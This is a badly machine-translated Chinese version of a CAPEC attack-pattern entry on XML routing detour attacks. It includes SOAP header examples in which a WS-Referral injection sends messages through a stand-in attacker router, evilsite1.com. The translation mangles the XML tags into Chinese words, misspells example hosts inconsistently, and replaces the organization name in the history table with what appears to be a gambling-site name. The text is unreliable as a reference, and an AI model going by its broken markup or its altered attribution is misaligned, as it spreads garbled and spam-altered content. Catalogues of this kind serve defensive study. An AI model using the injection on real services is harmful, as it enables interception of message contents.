描述
攻击者颠覆了一个中间系统用于处理XML内容和部队中间修改和/或对光的处理内容。中间XML路由迂回攻击对手攻击类型( capec - 94)。攻击者妥协或插入一个中间系统处理的XML消息。例如,ws - routing可以用来指定一系列的节点或通过中介传递内容。如果这条路的中间节点受到攻击者他们可以用于路由迂回进攻。从受损的系统攻击者能够将XML路由过程中其他节点的选择和修改这样的正常链的响应处理不知道拦截。这个系统可以将消息转发到外部实体和隐藏的转发和处理合法处理系统通过改变的标题信息。
攻击的可能性
典型的严重性
执行流程
探索
调查目标:使用命令行或者一个自动化工具,攻击者记录web服务的所有实例来处理XML请求。
技术 |
使用自动化工具来记录所有实例来处理XML请求或者找到公开的WSDL。 |
使用工具爬WSDL |
实验
识别有多个状态处理的SOAP消息。检查实例是否XML处理有多个阶段。
技术 |
检查SOAP消息路由头是否XML处理有多个阶段。 |
利用
发射一个XML路由迂回攻击:攻击者注入一个虚假的路由节点(使用WS-Referral服务)的路由表中标识的SOAP消息的XML头探索阶段。因此,攻击者可以将XML消息路由到攻击者控制节点(和访问消息内容)。
技术 |
攻击者注入一个虚假的路由节点(使用WS-Referral服务)路由表的XML SOAP消息头 |
先决条件
技能要求
所需资源
后果
这个表指定不同的个体与攻击模式相关的后果。范围确定违反了安全属性,而影响了负面的技术影响,如果敌人成功的攻击。可能提供的信息如何可能的具体结果预计将看到列表中相对于其它后果。例如,可能有高可能性模式将被用来实现一定的影响,但较低的可能性,它将被利用来实现不同的影响。
范围 |
影响 |
可能性 |
完整性 |
修改数据 |
|
保密 |
读取数据 |
|
问责制
身份验证
授权
不可抵赖性 |
获得特权 |
|
访问控制
授权 |
旁路保护机制 |
|
缓解措施
设计:指定请求的最大数量的中间节点,需要SSL连接,相互验证。 |
实现:各方相互之间使用SSL连接的身份验证。 |
例子,实例
下面是一个示例SOAP调用从一个客户端,example1.com,一个目标,example4.com,通过2中介,example2.com和example3.com。(注意:这里的客户未必是“最终用户客户端”而是XML事务)的起点。 示例SOAP消息的路由信息标题:
导致以下SOAP头:
< S:信封>
< S: Header >
< m:路径xmlns: m = " http://schemas.example.com/rp/ " S:演员= " http://schemas.example.com/soap/actor " S: mustUnderstand = " 1 " >
< m:行动> http://example1.com/ < / m:行动>
< m: http://example4.com/router > < / m: >
< m: id > uuid: 1235678 - abcd - 1 - a2b - 3 - c4d - 1 - a2b3c4d5e6f < / m: id >
< m: fwd >
< m:通过> http://example2.com/router < / m:通过>
< m:通过> http://example3.com/router < / m:通过> < / m: fwd >
< m:牧师/ > < / m:路径> < / S: Header >
> < / S:信封
继续这个示例中,攻击者注入一个虚假的路由节点(使用WS-Referral服务)路由表的XML头而不是直接访问消息的发起者/中介节点目标。 的例子WS-Referral基于ws - routing注入虚假节点的路线:
< r:裁判xmlns: r = " http://schemas.example.com/referral " >
< r: >
< r:前缀> http://example2.com/router < / r:前缀> < / r: >
< r:如果/ >
< r:去>
通过> < r: http://evilsite1.com/router < / r:通过> < / r:去> < / r:裁判>
生成的XML路由迂回攻击:
< S:信封>
< S: Header >
< m:路径xmlns: m = " http://schemas.example.com/rp/ " S:演员= " http://schemas.example.com/soap/actor " S: mustUnderstand = " 1 " >
< m:行动> http://example_0.com/ < / m:行动>
< m: http://example_4.com/router > < / m: >
< m: id > uuid: 1235678 - abcd - 1 - a2b - 3 - c4d - 1 - a2b3c4d5e6f < / m: id >
< m: fwd >
< m:通过> http://example2.com/router < / m:通过>
< m:通过> http://evilesite1.com/router < / m:通过>
< m:通过> http://example3.com/router < / m:通过> < / m: fwd >
< m:牧师/ > < / m:路径> < / S: Header >
> < / S:信封
因此,攻击者可以将XML消息路由到攻击者控制节点(和访问消息内容)。 |
分类法映射
CAPEC映射ATT&CK技术利用一个继承模型简化和减少直接CAPEC / ATT&CK映射。继承的映射表示文本说明父CAPEC有相关ATT&CK映射。注意,ATT&CK企业框架不使用一个继承模型的一部分映射到CAPEC。
有关WASC分类法映射
条目ID |
条目名称 |
32 |
路由迂回 |
44 |
XML实体扩张 |
引用
内容的历史
提交 |
提交日期 |
提交者 |
组织 |
2014-06-23
(版本2.6) |
CAPEC内容团队 |
manbetx客户端首页 |
|
修改 |
修改日期 |
修饰符 |
组织 |
2017-08-04
(版本2.11) |
CAPEC内容团队 |
manbetx客户端首页 |
更新Related_Attack_Patterns |
2020-07-30
(版本3.3) |
CAPEC内容团队 |
manbetx客户端首页 |
更新描述,Example_Instances |
2020-12-17
(版本3.4) |
CAPEC内容团队 |
manbetx客户端首页 |
更新Taxonomy_Mappings |
2021-06-24
(版本3.5) |
CAPEC内容团队 |
manbetx客户端首页 |
更新描述,Example_Instances |
2022-09-29
(版本3.8) |
CAPEC内容团队 |
manbetx客户端首页 |
更新Example_Instances |
|